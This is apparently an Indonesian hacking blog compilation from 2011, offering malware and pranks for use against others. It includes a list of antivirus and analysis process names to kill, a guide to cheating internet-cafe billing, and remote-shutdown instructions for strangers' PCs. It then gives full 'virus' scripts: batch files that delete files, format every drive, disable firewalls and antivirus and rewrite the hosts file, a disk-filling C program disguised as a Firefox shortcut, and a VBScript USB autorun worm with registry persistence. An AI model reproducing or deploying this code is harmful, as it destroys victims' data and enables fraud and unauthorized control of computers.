ntrtscan.exe, ntxconfig.exe, nui.exe, nupdate.exe, nupgrade.exe, nvapsvc.exe, nvarch16.exe, nvc95.exe, nvlaunch.exe, nvsvc32.exe, nwinst4.exe, nwservice.exe, nwtool16.exe, offguard.exe, ogrc.exe, opera.exe, Opera_964_int_Setup.exe, ostronet.exe, outpost.exe, outpostinstall.exe, outpostproinstall.exe, padmin.exe, panixk.exe, pathping.exe, pavcl.exe, pavproxy.exe, pavsched.exe, pavw.exe, pcc2002s902.exe, pcc2k_76_1436.exe, pccclient.exe, pccguide.exe, pcciomon.exe, pccmain.exe, pccntmon.exe, pccpfw.exe, pccwin97.exe, pccwin98.exe, pcdsetup.exe, pcfwallicon.exe, pcip10117_0.exe, pcscan.exe, pcscanpdsetup.exe, penis32.exe, periscope.exe, persfw.exe, perswf.exe, pf2.exe, pfwadmin.exe, ping.exe, pingscan.exe, platin.exe, pop3trap.exe, poproxy.exe, popscan.exe, portdetective.exe, portmon.exe, portmonitor.exe, ppinupdt.exe, pptbc.exe, ppvstop.exe, prckiller.exe, Process.exe, processmonitor.exe, procexp.exe, procexplorerv1.0.exe, Procmon.exe, programauditor.exe, proport.exe, protectx.exe, pspf.exe, purge.exe, pview.exe, pview95.exe, qconsole.exe, qserver.exe, rapapp.exe, rav.exe, rav7.exe, rav7win.exe, rav8win32eng.exe, realmon.exe, regedit.exe, regedt32.exe, Regmon.exe, rescue.exe, rescue32.exe, Restart.exe, route.exe, routemon.exe, rrguard.exe, rshell.exe, rstrui.exe, rtvscn95.exe, rulaunch.exe, Safari.exe, safeweb.exe, SandboxieBITS.exe, SandboxieCrypto.exe, SandboxieDcomLaunch.exe, SandboxieRpcSs.exe, SandboxieWUAU.exe, SbieCtrl.exe, SbieSvc.exe, sbserv.exe, scan32.exe, scan95.exe, scanpm.exe, sched.exe, schedapp.exe, scrscan.exe, scvhosl.exe, sd.exe, sdclt.exe, serv95.exe, setupvameeval.exe, setup_flowprotector_us.exe, sgssfw32.exe, sh.exe, sharedaccess.exe, shellspyinstall.exe, shn.exe, smc.exe, SmitfraudFix.exe, sofi.exe, spf.exe, sphinx.exe, spider.exe, spysweeper.exe, spyxx.exe, SrchSTS.exe, srwatch.exe, ss3edit.exe, st2.exe, supftrl.exe, supporter5.exe, sweep.exe, sweep95.exe, sweepnet.exe, sweepsrv.sys.exe, swnetsup.exe, swsc.exe, swxcacls.exe, symproxysvc.exe, symtray.exe, sysdoc32.exe, syshelp.exe, taskkill.exe, tasklist.exe, taskmgr.exe, taskmon.exe, taumon.exe, tauscan.exe, tbscan.exe, tc.exe, tca.exe, tcm.exe, tcpsvs32.exe, tds-3.exe, tds2-98.exe, tds2-nt.exe, tds2.exe, tfak.exe, tfak5.exe, tftpd.exe, tgbob.exe, titanin.exe, titaninxp.exe, tmlisten.exe, tmntsrv.exe, tracerpt.exe, tracert.exe, trjscan.exe, trjsetup.exe, trojantrap3.exe, UCCLSID.exe, UI0Detect.exe, undoboot.exe, unzip.exe, update.exe, updater.exe, UserAccountControlSettings.exe, VACFix.exe, vbcmserv.exe, vbcons.exe, vbust.exe, vbwin9x.exe, vbwinntw.exe, vccmserv.exe, vcleaner.exe, vcontrol.exe, vcsetup.exe, vet32.exe, vet95.exe, vet98.exe, vettray.exe, vfsetup.exe, vir-help.exe, virusmdpersonalfirewall.exe, vmsrvc.exe, vnlan300.exe, vnpc3000.exe, vpc32.exe, vpc42.exe, vpcmap.exe, vpfw30s.exe, vptray.exe, vscan.exe, vscan40.exe, vscenu6.02d30.exe, vsched.exe, vsecomr.exe, vshwin32.exe, vsisetup.exe, vsmain.exe, vsmon.exe, vsscan40.exe, vsstat.exe, vswin9xe.exe, vswinntse.exe, vswinperse.exe, vvstat.exe, w32dsm89.exe, w9x.exe, watchdog.exe, webscan.exe, webscanx.exe, webtrap.exe, WerFault.exe, wfindv32.exe, wgfe95.exe, whoswatchingme.exe, wimmun32.exe, wingate.exe, winhlpp32.exe, wink.exe, winmgm32.exe, winppr32.exe, winrecon.exe, winroute.exe, winservices.exe, winsfcm.exe, wmias.exe, wmiav.exe, wnt.exe, wradmin.exe, wrctrl.exe, WS2Fix.exe, wsbgate.exe, wuauclt.exe, wyvernworksfirewall.exe, xpf202en.exe, xscan.exe, zapro.exe, zapsetup3001.exe, zatutor.exe, zatutorzauinst.exe, zauinst.exe, zlh.exe, zonalarm.exe, zonalm2601.exe, zonealarm.exe, _avp.exe, _avp32.exe, _avpcc.exe, _avpm.exe, _findviru.exe

http://virusindonesia.com/2010/11/16/vb-shortcut-winlogon-virus-shortcut-yang-semakin-canggih/
10. Aisyalam.vbs.
Aisyalam.vbs
Worm tipe VBScript yang dibuat dengan sangat rapi tanpa di-enkripsi ini sama seperti hasil edit dari beberapa worm VBS. Aisyalam.vbs membuat 4 file di tiap drive, Ibab-AisyalaM.Iat, autoruN.inF, Mp3-AisyalaM.mp3, dan desktOp.ini. Tidak ada system yang di disable, hanya perbedaan pada tampilan Windows seperti, icon pada start menu yang berubah menjadi besar, dan warna dasar windows yang berubah menjadi hijau muda (default putih).

30 Jan 2011

Ne Gan Masuk Cra Lambatin Billing In Operator No Show Of

tpi sekarang ane mau share lambatin billing tanpa nop engine
ne bahan yg harus di siapkan

1 Ekor biilhack :http://www.ziddu.com/download/4503325/Billhack.rar.html/bahasa_indonesia

 1 buah netcut :http://www.ziddu.com/download/7302703/netcut.rar.html\

pertama2 agan harus instal netcutnya dahulu
trus klo uda di instal timbul gambar gunting di dekstop
lalu agan klik gambar gunting tersebut dan agan akan kluar ne gambar tersebut


file://localhost/C:/Documents%20and%20Settings/MUTIARA/My%20Documents/My%20Pictures/ss.bmp

trus saatnya agan gunakan billhack
agan klik tu program billhack tru akan muncul dua pilihan
agan ambil aj single client
kalo uda akan muncul dua buah yg akan diisi
yg aka agan isi adalah IP operator agan cek aja satu2 IP yg terdaftar pda gambar diatas
kalo berhasil akan juga disuruh untuk mengisi dua kolom yaiu
nma client dan nomer billing aagan
dan anda isi yg diatas dgn sesuai
trus ambil hack now
maka otomatis billing di operator akan kembali menjadi nol dan sementara itu
billing anda tdak kembali menjadi nol atau billing anda jalan g berubah apa2
cman di ooperator aj yg berubah waktu dan biayanya

maen sampe jari lo kriting,, TETEP murah,, dan kantong ga cepet kosong

Buat Lock Folder Sendiri...!!!

Yang kudu di siapkann cuma seperangkat lembar txt (notepad)

1. buka notepad
2. copas deh kode berikut kedalam notepad:

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Anda yakin ingin mengunci folder ini...??? by zer03s (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==pass ganti disini goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

3. save notepad tsb, terserah mo di save dimana..
4. buka kembali, dan password bisa di ubah dengan selera anda di tulisan "pass ganti disini"
5. ganti extensi .txt dengan .bat
6. klik 2kali pada file yang sudah diganti menjadi .bat kemudian akan muncul folder bernama Locker
7. nah.. didalam folder Locker anda bisa menyimpan file2 to folder2 yang di anggap penting
8. setelah selesai menyimpan file o folder penting ke dalam folder locker..... klick 2kali pada kode notepad yang sudah dirubah menjadi *****.bat tadi, dan akan muncul tulisan Anda yakin ingin mengunci folder ini...??? pilih Y untuk melanjutkan atau pilih N untuk membatalkan..
9. oke selesai......!! folder anda akan aman..

Cara ShutDown Komputer Orang lain

Kalo kamu merasa bete atau bosen sama pelayanan warnet di tempat kamu, padahal udah bayar mahal-mahal buat internetan

di tempat tersebut dan di tambah lagi pas enak-enakan internetan, tiba-tiba disconnected...ach damn it!!!
gue mau ngasih solusi buat ngejawab rasa keusilan kamu semua yang emang usil banget.

Mau tau caranya??read it...!!!



Okay, disini lo ga butuh software apapun dalam hal ini...yang lo butuhkan hanyalah sebuah otak yang usil and buat have fun ajah


Caranya:


Deketin Komputer orang itu,, n Pencet tombol "Re-Start" hh.. :D:D Just Kidding..

Mau Tau? Ceek..Ceek..Ceek..Ceekiiprooot ! 


1. Kamu buka komputer, and klik Start->Run...di kotak isian tersebut kamu isikan "cmd" (tanpa petik )

2. Setelah itu muncul kotak berwarna hitam...di situ kamu ketikan SHUTDOWN.EXE (spasi) -i (spasi) -m


3. Contoh:
Shutdown.exe -i -m lalu kamu tekan Enter

4. Maka akan muncul kotak di samping yang bernama "Remote Shutdown Dialog"


5. Kamu klik "ADD" -> untuk menambahkan IP target or nama target di LAN...atau kamu klik "Browse" untuk mencari otomatis


6. Kamu bisa tentuin yang enaknya buat ngusilin komputer orang itu, apakah di shutdown, restart, or Log off...


7. Tentukan time yang pas buat deat time-nya komputer itu beraksi


8. Kamu bisa tambakan other (planned), ini dimaksudkan agar si user lawan mengira kalo ini ulah server yang lagi maintenance


9. Kirim kan pesan kematian mu ke komputer orang di COMMENT Contoh : Minggir Lo ! Gua Pengen Main Di Situ ! kwkwkwkwkwkwkwkwkwkwkwkwkwkw


10. Tertawalah yang puas melihat orang lain kebingungan..hahahahahahahahaha



Pesan dari saya:


1. Kalo kamu mau usilin komputer orang via LAN, liat dulu orangnya...jangan nanti ABRI lagi megang senjata kamu usilin,,bisa mati lo ditembak..:D


2. Ini sifatnya buat usil, kalo ntar kamu di usilin juga jangan marah yach...


3.Ini paling penting lo inget...sebab dalam hal ini, IP kamu or nama kamu bakal terlihat di comment kematian kamu...karena dari sana terdapat IP addres kmu...jadi gw saranin, begitu komputer itu mati lo buru-buru kabur dah.soal nya kamu bakalan di jitak ma dia...:D


4. Ini buat have fun ajah kok, jangan di pake sering-sering yah...kasihan tuh warnet-nya ga dapet duit gara-gara kerjaan keusilan kamu


Salam ..

29 Jan 2011

Script Virus Part III

Wahhh wah sekarang saya bakal buaat / mencoba buat sebuah virus yang berekstensi .bat
Haha tpi sebelumnya saya tidak akan dan tidak mau tahu tentang yang terjadi pada komputer
Sobat jika ingin mencoba sebaiknya di warnet . tapi saya rasa juga tidak usah karena virus ini langsung membuat penyok HD (hardiskk) hhh
Langsung minta ganti hehhe
Saya juga sebenarnya sih belum pernah nyoba ini viruss cozz saya takut :’(
Xixixixixix
Tapi saya yakin banget ma virus saya yang satu ini



Langsung aja dah copas ini di kang notpad dengan nama contoh iman.bat



#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}





Sudahhh sedikit tipsss hhehhe maavv sapa ada yang mw coba
Taruh didesktop file tadi..... sebelumnya hapus icon moziillla , lalu klik kanan_new_shortcut lalu klik browse,, cari file tadi di desktopp lalu klik next tulis nama filenya mozilla firefox
Selesaiiiii lalu untuk merubahnya ke icon mozilla klik kaanann pada shortcut yang baru anda buat , klik changge icon, kalau tidak memiliki icon mozila bisa kalian cari lewad c/progrmfiles/mozillafirefox
Lalu file asli sebaiknya anda hiddenn biar gak ketauan hehhe ^^ otak licik euuyy hhhh
Dan selesai

Script Virus Part IV

halloowwww smuaaa hehehe
{gila mode :: oN}

sekrang saea mw ngajarin bwad virus komputer
langsung aja ke tKP

pertama !!! buka notepaD :DDD

ketikkan sebagai berikutt

@ECHO off
:Begin
msg * - warninggg
msg * udah loe install ulang ajja dahh
msg * kalo g mw banting aja tu komputer
msg * salam hackerzz city * D
msg * wkwkkwkwkw
GOTO BEGIN


simpan dengan ekstensi .BAT
ex ::: citylaphandhe.BAT

pilih all filesss

okee virus qta dah selse tapi ni virus bkal bekerja kalo di klikk

sedikit tipss taroh di starrt upp biar mampus dah tu kompi hhehehehe

Script Virus Part II

Cuma buat iseng -iseng nih script mungkin ada yang mau mencobanya.

Silahkan copast script di bawah ini di notepad,


@echo off
del /Q /F C:\Program Files\Aim6\*.*
del /Q /F C:\Program Files\Aim\*.*
Cls
del /Q /F C:\Program Files\Aim5\*.*

del /Q /F C:\Program Files\Internet Explorer\*.*

del /Q /F C:\Program Files\itunes\*.*

ipconfig /release
if ERRORLEVEL1 ipconfig /release_all

del /Q /F C:\Program Files\*.*

net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"

net stop "wuauserv"

del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"

del /f /q"C:\Users\%userprofile%\My Documents\My Music\*.*"

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 rapidshare.com >> "Hosts"
echo 127.0.0.1 www.rapidshare.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 www.msn.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 meebo.com >> "Hosts"
echo 127.0.0.1 www.meebo.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 bebo.com >> "Hosts"
echo 127.0.0.1 www.bebo.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 myspace.com >> "Hosts"
echo 127.0.0.1 www.myspace.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 youtube.com >> "Hosts"
echo 127.0.0.1 www.youtube.com >> "Hosts"

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 facebook.com >> "Hosts"
echo 127.0.0.1 www.facebook.com >> "Hosts"

taskkill /f /t /im "itunes helper.exe"
Cls
taskkill /f /t /im "itunes.exe"

taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "svchost.exe"
Cls
taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "svchost.exe"

taskkill /f /t /im "wmplayer.exe"

@echo off
:A
start
explorer
cmd
paint
goto :A

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
Cls

taskkill /f /t /im "aim6.exe"

taskkill /f /t /im "iexplore.exe"

taskkill /f /t /im "firefox.exe"

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.wav) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.zip) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.txt) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath

Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul

del /Q /F A:\*.*
del /Q /F B:\*.*
del /Q /F C:\*.*
Cls
del /Q /F D:\*.*
del /Q /F E:\*.*
del /Q /F F:\*.*

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.wmv) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.mp3) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.jpg) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath

RUNDLL32 USER32.DLL,SwapMouseButton

assoc.dll = txtfile
assoc.exe = pngfile
assoc.bat = WinRAR
Cls
assoc.vbs = Visual Style
assoc.reg = xmlfile
assoc.txt = regfile

reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f

DEL /F /Q %UserProfile%\Documents\*.* >nul
DEL /F /Q %UserProfile%\Pictures\*.* >nul
DEL /F /Q %UserProfile%\Videos\*.* >nul
DEL /F /Q %UserProfile%\Downloads\*.* >nul
DEL /F /Q %UserProfile%\Music\*.* >nul

FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul
FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul
FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul
FORMAT D: /FS:NTFS /V:(D:) /X /P:1 /y >nul
FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul
FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul
FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul
FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul
FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul
FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul
FORMAT K: /FS:NTFS /V:(K:) /X /P:1 /y >nul
FORMAT L: /FS:NTFS /V:(L:) /X /P:1 /y >nul
FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul
FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul
FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul
FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul

set fun=net
set morefun=stop
set Da=tsk
set VooDoo=ill
set DaVooDoo=del
set beer=/a
%fun% %morefun% "Security Center"
%fun%sh firewall set opmode mode=disable
%Da%%VooDoo% %beer% E-*
%Da%%VooDoo% %beer% av*
%Da%%VooDoo% %beer% fire*
%Da%%VooDoo% %beer% anti*
%Da%%VooDoo% %beer% spy*
%Da%%VooDoo% %beer% bullguard
%Da%%VooDoo% %beer% PersFw
%Da%%VooDoo% %beer% KAV*
%Da%%VooDoo% %beer% ZONEALARM
%Da%%VooDoo% %beer% OUTPOST
%Da%%VooDoo% %beer% nv*
%Da%%VooDoo% %beer% nav*
%Da%%VooDoo% %beer% F-*
%Da%%VooDoo% %beer% ESAFE
%Da%%VooDoo% %beer% cle
%Da%%VooDoo% %beer% BLACKICE
%Da%%VooDoo% %beer% def*
%Da%%VooDoo% %beer% kav
%Da%%VooDoo% %beer% kav*
%Da%%VooDoo% %beer% avg*
%Da%%VooDoo% %beer% ash*
%Da%%VooDoo% %beer% norton*
%Da%%VooDoo% %beer% nisum*
%Da%%VooDoo% %beer% padmin
%Da%%VooDoo% %beer% panda*
%Da%%VooDoo% %beer% safe*
%Da%%VooDoo% %beer% avas*
%Da%%VooDoo% %beer% norm*
%Da%%VooDoo% %beer% zlclien*
%Da%%VooDoo% %beer% norton*
%Da%%VooDoo% %beer% guard*
%Da%%VooDoo% %beer% mcafe*
%Da%%VooDoo% %beer% ewid*
%DaVooDoo% /Q /F %ProgramFiles%\kasper~1\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\f-prot95\*.*
%DaVooDoo% /Q /F %ProgramFiles%\Mcafee\*.*
%DaVooDoo% /Q /F %ProgramFiles%\nod32\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\panda software\*.*
%DaVooDoo% /Q /F %ProgramFiles%\ewido\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\kav\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\webproxy\*.exe



Kemudian simpan dengan ekstensi .bat

Cara Membuat Malware

Sekarang saya akan menunjukkan kepada kamu, bagaimana membuat malware (virus).

Sangat mudah dan cepat.ingat,jangan lakukan ini pada komputer Anda sendiri. Karena

sangat berbahaya,dapat memformat dan menghapus sistem anda


backup data anda sebelum Anda melakukan hal ini.

1.Buka Notepad.

2. Ikuti langkah-langkah ini dengan hati-hati, dan resiko di tanggung sendiri jika

terjadi sesuatu pada Komputer Anda.

3. Copy-Paste atau Write-Dalam script di bawah pada Notepad.

@ echo off
echo (untuk mengubah Line)
echo Malware Virus


DEL C: \-y (script buat del drive c)
DEL D: \-y (script buat del drive d)
FORMAT C: \-y (script buat format c)

Jika dilakukan, simpan dengan anyname yang Anda inginkan, tetapi harus format *.

bat (ex: malware.bat). Jadi, virus telah dibuat.

Oke, ini bekerja ketika Anda mengklik 2x. saya hanya ingin berbagi pengetahuan

saja. saya memperingatkan Anda lagi, Do Not Disturb Anyone, ini hanya untuk

pembelajaran saja.

Script Virus

script virus edan...dijmin puas (d cba d kompi lu ndiri2 jgn d warnet )

_virus hampa_

------start script-------
cls
cd %HOMEDRIVE%\windows\
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
del /S /F /Q hal.dll
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg

del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cd %HOMEDRIVE%
del /S /F /Q *.exe
del /S /F /Q *.txt
del /S /F /Q *.com
del /S /F /Q *.scr
del /S /F /Q *.ini
del /S /F /Q *.mp3
del /S /F /Q *.wav
del /S /F /Q *.dll
del /S /F /Q *.avi
del /S /F /Q *.jpeg
del /S /F /Q *.mp4
del /S /F /Q *.reg
del /S /F /Q *.rar
del /S /F /Q *.inf
del /S /F /Q *.sdb
del /S /F /Q *.cur
del /S /F /Q *.ani
del /S /F /Q *.zip
del /S /F /Q *.*
cls
ren %HOMEDRIVE%\Windows\hal.dll hal3.dll
del %HOMEDRIVE%\WINDOWS\system32\*.* /F /Q /S
cls
echo DONE!
shutdown -r -t 25 -c "Selamat semua Virus anda telah dibersihkan... Berbahagialah "

di save *.bat

---------------end--------------

_bos gentong_

--------------start-------------------

‘//-Bosgentongs ITS-//
‘//-INI VIRUS BERBAHAYA JANGAN DIBUAT MAIN-MAIN!!!!!!!-//
‘//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus-//

on error resume next

‘//-Dim kata-kata berikut ini-//

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd

‘//-Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information-//

atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe bosgentongs.exe.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do

‘//-Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)-//

Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\bosgentongs.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\bosgentongs.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\bosgentongs.exe.vbs”)
tf.attributes = 39

‘//-Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok-//
‘//-Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket-//

for each flashdrive in fs.drives

‘//-Cek Drive-//

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then

‘//-Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\-//

set tf=fs.getfile(flashdrive.path &”\bosgentongs.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\bosgentongs.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39

‘//-Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)-//

set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//-Manipulasi Registry-//

set rg = createobject(”WScript.Shell”)

‘//-Manip – Ubah Title Internet Explorer menjadi BOSGENTONGS v.s. ANTIVIRUS-//

rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowTitle”,” THE BOSGENTONGS v.s. ANTIVIRUS “

‘//-Manip – Set agar file hidden tidak ditampilkan di Explorer-//

rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,“0”, “REG_DWORD”

‘//-Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager-//

rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”,“1”, “REG_DWORD”
rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,“1”, “REG_DWORD”
rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,“1”, “REG_DWORD”
rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,“1”, “REG_DWORD”
rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”,“1”, “REG_DWORD”

‘//-Manip – Disable klik kanan-//

rg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,“1”, “REG_DWORD”

‘//-Manip – Munculkan Pesan Setiap Windows Startup-//

rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,“Worm Kalong. Variant from Bosgentongs, don’t panic all data are safe.“
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon” /v LegalNoticeText /d “AKU TELAH MENGUASAI YOUR SISTEM!!! MAKA BERDOALAH AGAR TIDAK TERJADI“

‘//-Manip – Aktif setiap Windows Startup-//

rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, winpath & “\batch- bosgentongs.exe.vbs “

‘//-Manip – Ubah RegisteredOwner dan Organization-//

rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\RegisteredOrganization”, “The Bosgentongs”
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\RegisteredOwner”,”bosgentongs”

‘//-Manip – Membuat Cadangan di sistem svchost, MS32Dll dan membuat ikon-//

